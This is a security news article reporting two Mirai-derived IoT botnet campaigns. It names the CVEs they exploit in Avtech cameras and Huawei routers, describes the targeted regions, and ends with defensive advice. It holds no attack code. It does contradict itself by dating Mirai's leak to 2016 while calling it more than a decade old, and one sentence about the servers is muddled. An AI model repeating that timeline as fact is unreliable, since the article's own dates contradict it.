Mirai Botnet Offshoots Instigate Global DDoS Attack Surge

January 21, 2025

Two distinct campaigns are currently exploiting vulnerabilities in a variety of IoT devices across the globe, with the objective of compromising these devices and disseminating malware on a global scale. These campaigns are the work of separate derivatives of the notorious Mirai botnet and are behind a new wave of distributed denial-of-service (DDoS) attacks worldwide. One campaign is exploiting specific vulnerabilities in IoT devices to create extensive botnet networks, while the other has been launching DDoS attacks on organizations in North America, Europe, and Asia since the end of 2024, according to researchers.

An ongoing operation within the Mirai framework, known as 'Murdoc_Botnet', has been active since July and is currently targeting Avtech cameras and Huawei HG532 routers, according to a report released today by Qualys researchers. The report reveals that there are over 1,300 active IPs associated with this operation. The researchers have identified more than 100 unique sets of servers linked to the Murdoc botnet, each tasked with deciphering its activities and establishing communication with one of the compromised IPs implicated in this ongoing campaign.

In a separate study by Trend Micro, a botnet made up of malware variants derived from both Mirai and Bashlite is exploiting security vulnerabilities and weak credentials in IoT devices to launch DDoS attacks across the globe. The malware infiltrates the device by exploiting RCE vulnerabilities or weak passwords, then executes a download script on the infected host.

The two campaigns highlight the enduring impact of Mirai, a botnet that has produced numerous variants since its source code was leaked in 2016 and continues to pose a significant security threat more than a decade after it first emerged on the cyberattack landscape. The Murdoc botnet, which delivers Mirai malware, leverages existing exploits, including CVE-2024-7029 and CVE-2017-17215, to download next-stage payloads. The former is a flaw in Avtech cameras that enables commands to be injected over the network and executed without authentication, while the latter is a remote code execution (RCE) flaw found in Huawei routers. Most of the IP addresses associated with the Murdoc botnet campaign are located in Malaysia, followed by Thailand, Mexico, and Indonesia.

Researchers at Trend Micro initially detected large-scale DDoS botnet attacks against Japanese organizations, including major corporations and banks, at the end of 2024, but then traced the activity to a larger global campaign. The primary devices targeted in these attacks have been wireless routers and IP cameras from prominent brands, including TP-Link and Zyxel routers, and Hikvision IP cameras. As with the Murdoc botnet activity, cyberattackers targeted flaws in these devices to compromise them, but they also exploited weak passwords to gain access.

With Mirai variants continuing to generate new botnets for launching new and widespread DDoS attacks, it is crucial that organizations can identify and protect their networks from floods of unwanted traffic. Qualys researchers suggest that organizations regularly monitor suspicious processes, events, and network traffic generated by the execution of any untrusted binary/scripts, and exercise caution when executing shell scripts from unknown and untrusted sources.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.